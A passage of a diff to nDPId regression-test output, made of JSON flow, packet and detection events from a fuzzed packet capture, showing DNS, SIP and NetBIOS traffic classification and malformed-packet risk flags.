{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":41,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":645,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471001714,"flow_last_seen":1120471010718,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2823,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470399719,"flow_last_seen":1120470399719,"flow_idle_time":620000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","l4_proto":0,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470399719,"flow_last_seen":1120470399719,"flow_idle_time":620000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","l4_proto":0,"flow_datalink":1,"flow_max_packets":3} 00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470819393,"flow_last_seen":1120470819393,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":21,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470819393,"flow_last_seen":1120470819393,"flow_idle_time":200000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":21,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470814187,"flow_last_seen":1120470814187,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.119.2","src_port":53,"dst_port":2799,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470814187,"flow_last_seen":1120470814187,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.119.2","src_port":53,"dst_port":2799,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814186,"flow_last_seen":1120470814186,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2799,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470814334,"flow_last_seen":1120470817390,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471010718,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471018720,"flow_last_seen":1120471018720,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471018720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1120471018720,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120471018720,"pkt":"ADBUADRWAODtAW69CABFAABEbEkAAIARSwzAqAECwKgBAQsIADUAMBesDQsAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471018720,"flow_last_seen":1120471018720,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471018720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471018720,"flow_last_seen":1120471018720,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471018720,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":2,"flow_last_seen":1120471018721,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120471018721,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CwgAR8InDQuAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAgQAAJxAACwlsb2NhbGhvc3QA"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":647,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471018720,"flow_last_seen":1120471018721,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471018721,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":647,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471018720,"flow_last_seen":1120471018721,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471018721,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2824,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":649,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":308,"global_ts_msec":1120471018870} 00741{"packet_event_id":1,"packet_event_name":"packet","packet_id":649,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":342,"pkt_l4_len":0,"thread_ts_msec":1120471018723,"pkt":"AODtAW69ADBUADRWCABFAAFIAABACDcRiuXU8iEjwKgBAhPEE8QBNCHFU0lQLzIuMCAxMDAgVHJ5aW5nDQpDYWxsLUlEOiAyOTg1ODE0qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":652,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471019307,"flow_last_seen":1120471019307,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471019307,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1120471019307,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471019307,"pkt":"ADBUADRWAODtAW69CABFAABIbEwAAIARSwXAqAECwKgBAQsJADUANMyuXQ0BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471019307,"flow_last_seen":1120471019307,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471019307,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471019307,"flow_last_seen":1120471019307,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471019307,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":654,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":1120471020302,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471020302,"pkt":"ADBUADRWAODtAW69CABFAABIbE4AAIARSwPAqAECwKgBAQsJADUANMyuXQ0BAAABAAAAAAAAcF9zaXAEX3VkcANzaXAJY3liZXJjaXT5AmRrAAAhAAE="} -00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":654,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471019307,"flow_last_seen":1120471020302,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471020302,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":654,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471019307,"flow_last_seen":1120471020302,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471020302,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":656,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":3,"flow_last_seen":1120471022305,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120471022305,"pkt":"ADBUADRWAODtAW69CABFAABIbFAAAIARSwHAqAECwKgBAQsJADUANMyuXQ0BAAABAAAAAAAABF+qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":659,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471019307,"flow_last_seen":1120471024307,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471024307,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":659,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120471019307,"flow_last_seen":1120471024307,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471024307,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2825,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470834515,"flow_last_seen":1120470834515,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471028313,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":18162,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831516,"flow_last_seen":1120470831516,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471028313,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2568,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470831400,"flow_last_seen":1120470831402,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471028313,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470831400,"flow_last_seen":1120470831402,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120471028313,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470832512,"flow_last_seen":1120470840523,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120471028313,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2802,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471033895,"flow_last_seen":1120471033895,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120471033895,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1120471033895,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1120471033895,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAADlbFMAAIARSWPAqAECwKgB\/wCKAIoA0VrwEQ6FZMCoAQIAigC7AAAgRUVEQURBBENERURHREZDQUNBQ0FDQUNBQ0FDQUNBQ0EAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJOAP+qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471033895,"flow_last_seen":1120471033895,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120471033895,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":661,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471033895,"flow_last_seen":1120471033895,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120471033895,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471036315,"flow_last_seen":1120471036315,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120471036315,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2826,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1120471036315,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120471036315,"pkt":"ADBUADRWAODtAW69CABFAABEbFQAAIARSwHAqAECwKgBAQsKADUAMJWmjw4AAAABAAAAAAAAATEBEgEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} 